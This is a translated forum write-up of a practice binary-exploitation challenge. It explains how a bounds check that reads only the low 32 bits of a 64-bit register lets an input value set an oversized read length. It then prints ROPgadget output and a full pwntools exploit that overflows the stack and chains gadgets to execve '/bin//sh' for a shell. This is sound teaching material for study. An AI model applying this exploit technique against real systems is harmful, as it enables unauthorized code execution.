Exploitation Arising from Register Width Differences
2020-02-24 18:58:00 Author: mp.weixin.qq.com (view original) Reads: 90

This article is a featured post from the Kanxue (看雪) forum.

Kanxue forum author ID: kabeor

I saw someone share a practice challenge that I found interesting (at least for a newcomer like me), so I would like to share my approach.

  |63..32|31..16|15..8|7..0|
                |AH...|AL..|
                |AX.........|
         |EAX...............|
  |RAX.......................|

The diagram above shows how the 16-, 32- and 64-bit registers overlap: AX is the low 16 bits of EAX, and EAX is the low 32 bits of RAX.

Security checks

  Arch:     amd64-64-little
  RELRO:    Partial RELRO
  Stack:    No canary found
  NX:       NX enabled
  PIE:      No PIE (0x400000)

IDA analysis

There is one piece of junk code (花指令); nop it out first and look at the logic:

The input must be less than or equal to 10, i.e. 0xA, otherwise the program exits.

Look at the assembly:

We can see:

  eax              0000 000a
  rax    0000 0000 0000 000a
  rax    0000 0001 0000 000a    a value constructed like this also passes the check

The cmp instruction implicitly computes op1 - op2 and tests whether the result is zero. Because only the low 32 bits take part in the check, this can be used to trigger an integer-overflow-like bug.

So if we construct 0x1 0000 0009 - 0xa, the contents of eax become 0xffff ffff, and the later read of name can then read a very large number of bytes, causing a stack overflow.
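To make the register-width issue concrete, here is an added example (not the challenge binary's code and not the author's): a C model of the flawed pattern, in which a value parsed into 64 bits is bounds-checked only through its low 32 bits, next to a version that checks the full width. The function names, the parsing calls, the name-buffer size and the sample inputs are assumptions; the bound 0xA and the input 4294967290 are the ones the write-up uses.

```c
#include <errno.h>
#include <stdint.h>
#include <stdlib.h>

#define MAX_WEIGHT 10   /* the challenge's bound, 0xA */
#define NAME_BUF   64   /* assumed size of the name buffer (constructed) */

/* Constructed model of the flawed pattern, not the challenge binary:
 * the number is parsed into a 64-bit register (rax), but the bound is
 * tested only against the low 32 bits (eax), so neither the high dword
 * nor the sign of the low dword is ever examined. Returns the length
 * that would be handed to read(), or -1 if the check rejects the input. */
long long read_len_vulnerable(const char *input)
{
    uint64_t w = strtoull(input, NULL, 10);      /* full value in rax */
    int32_t low = (int32_t)(w & 0xffffffffu);    /* what cmp eax, 0xA sees */
    if (low > MAX_WEIGHT)
        return -1;                               /* program would exit */
    return (long long)(uint32_t)low;             /* eax, zero-extended */
}

/* Hardened version: parse strictly, compare at full width, reject
 * negatives, and clamp to the buffer as defence in depth. */
long long read_len_fixed(const char *input)
{
    char *end = NULL;
    errno = 0;
    long long w = strtoll(input, &end, 10);
    if (errno != 0 || end == input || *end != '\0')
        return -1;                               /* not a clean integer */
    if (w < 0 || w > MAX_WEIGHT)
        return -1;                               /* whole-width range check */
    return w < NAME_BUF ? w : NAME_BUF - 1;      /* never exceed the buffer */
}
```

With the flawed check, 4294967290 (0xfffffffa) is seen as -6 and passes, after which the zero-extended 32-bit value drives a read of about 4 GB; 4294967306 (0x1 0000 000a) passes for the other reason, the ignored high dword.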
 
Running the file command shows that the program is statically linked:
  ELF 64-bit LSB executable, x86-64, version 1 (GNU/Linux), statically linked, for GNU/Linux 2.6.32, BuildID[sha1]=c69a6b123774b6c538eb99551edd57bc703c32f9, not stripped

The program also contains a syscall instruction, so a ret2syscall ROP chain can be used directly.

For this challenge, the arguments to syscall can either be set up by hand or the chain can be generated directly with ROPgadget:
  ROPgadget --binary intoverflow --ropchain

It generates the following (the chain writes "/bin//sh" into .data, sets up rdi/rsi/rdx, and uses 59 add rax, 1 gadgets to set rax to 59, the execve syscall number on x86-64):

  ROP chain generation
  ===========================================================

  - Step 1 -- Write-what-where gadgets

      [+] Gadget found: 0x47c601 mov qword ptr [rsi], rax ; ret
      [+] Gadget found: 0x4017b7 pop rsi ; ret
      [+] Gadget found: 0x480956 pop rax ; pop rdx ; pop rbx ; ret
      [+] Gadget found: 0x42660f xor rax, rax ; ret

  - Step 2 -- Init syscall number gadgets

      [+] Gadget found: 0x42660f xor rax, rax ; ret
      [+] Gadget found: 0x46ea20 add rax, 1 ; ret
      [+] Gadget found: 0x46ea21 add eax, 1 ; ret

  - Step 3 -- Init syscall arguments gadgets

      [+] Gadget found: 0x401696 pop rdi ; ret
      [+] Gadget found: 0x4017b7 pop rsi ; ret
      [+] Gadget found: 0x442e46 pop rdx ; ret

  - Step 4 -- Syscall gadget

      [+] Gadget found: 0x4003da syscall

  - Step 5 -- Build the ROP chain

      #!/usr/bin/env python2
      # execve generated by ROPgadget

      from struct import pack

      # Padding goes here
      p = ''

      p += pack('<Q', 0x00000000004017b7) # pop rsi ; ret
      p += pack('<Q', 0x00000000006ca080) # @ .data
      p += pack('<Q', 0x0000000000480956) # pop rax ; pop rdx ; pop rbx ; ret
      p += '/bin//sh'
      p += pack('<Q', 0x4141414141414141) # padding
      p += pack('<Q', 0x4141414141414141) # padding
      p += pack('<Q', 0x000000000047c601) # mov qword ptr [rsi], rax ; ret
      p += pack('<Q', 0x00000000004017b7) # pop rsi ; ret
      p += pack('<Q', 0x00000000006ca088) # @ .data + 8
      p += pack('<Q', 0x000000000042660f) # xor rax, rax ; ret
      p += pack('<Q', 0x000000000047c601) # mov qword ptr [rsi], rax ; ret
      p += pack('<Q', 0x0000000000401696) # pop rdi ; ret
      p += pack('<Q', 0x00000000006ca080) # @ .data
      p += pack('<Q', 0x00000000004017b7) # pop rsi ; ret
      p += pack('<Q', 0x00000000006ca088) # @ .data + 8
      p += pack('<Q', 0x0000000000442e46) # pop rdx ; ret
      p += pack('<Q', 0x00000000006ca088) # @ .data + 8
      p += pack('<Q', 0x000000000042660f) # xor rax, rax ; ret
      p += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
      # (the add rax, 1 ; ret line above is emitted 59 times in total)
      p += pack('<Q', 0x00000000004003da) # syscall

The exploitation plan is therefore:
1. Input the constructed number so that the read length becomes very large
2. Fill up to the saved return address
3. Append the ROP chain

exp

  from pwn import *
  from struct import pack

  p = process('./intoverflow')

  # filler up to the saved return address, then the ROPgadget chain
  payload = 'a' * 88
  payload += pack('<Q', 0x00000000004017b7)       # pop rsi ; ret
  payload += pack('<Q', 0x00000000006ca080)       # @ .data
  payload += pack('<Q', 0x0000000000480956)       # pop rax ; pop rdx ; pop rbx ; ret
  payload += '/bin//sh'
  payload += pack('<Q', 0x4141414141414141)       # padding
  payload += pack('<Q', 0x4141414141414141)       # padding
  payload += pack('<Q', 0x000000000047c601)       # mov qword ptr [rsi], rax ; ret
  payload += pack('<Q', 0x00000000004017b7)       # pop rsi ; ret
  payload += pack('<Q', 0x00000000006ca088)       # @ .data + 8
  payload += pack('<Q', 0x000000000042660f)       # xor rax, rax ; ret
  payload += pack('<Q', 0x000000000047c601)       # mov qword ptr [rsi], rax ; ret
  payload += pack('<Q', 0x0000000000401696)       # pop rdi ; ret
  payload += pack('<Q', 0x00000000006ca080)       # @ .data
  payload += pack('<Q', 0x00000000004017b7)       # pop rsi ; ret
  payload += pack('<Q', 0x00000000006ca088)       # @ .data + 8
  payload += pack('<Q', 0x0000000000442e46)       # pop rdx ; ret
  payload += pack('<Q', 0x00000000006ca088)       # @ .data + 8
  payload += pack('<Q', 0x000000000042660f)       # xor rax, rax ; ret
  payload += pack('<Q', 0x000000000046ea20) * 59  # add rax, 1 ; ret, 59 times -> rax = 59 (execve)
  payload += pack('<Q', 0x00000000004003da)       # syscall

  p.recvuntil('Plz Input Your weight(kg):\n> ')
  p.sendline('4294967290')                        # 0xfffffffa: only the low 32 bits reach the <= 0xA check
  p.recvuntil('Good! what\'s your name??\n> ')
  p.sendline(payload)
  p.interactive()
- End -

Kanxue ID: kabeor

https://bbs.pediy.com/user-787320.htm

*This article is an original by kabeor on the Kanxue forum; please credit the Kanxue community when reposting.

Source: http://mp.weixin.qq.com/s?__biz=MjM5NTc2MDYxMw==&mid=2458303650&idx=1&sn=6330f6a918f9aef549db85e9105a7e63&chksm=b1818c2886f6053e53558fc62fc4ef321fd163d682d6e02d87773ff0edd2cda1e0c57777fe76#rd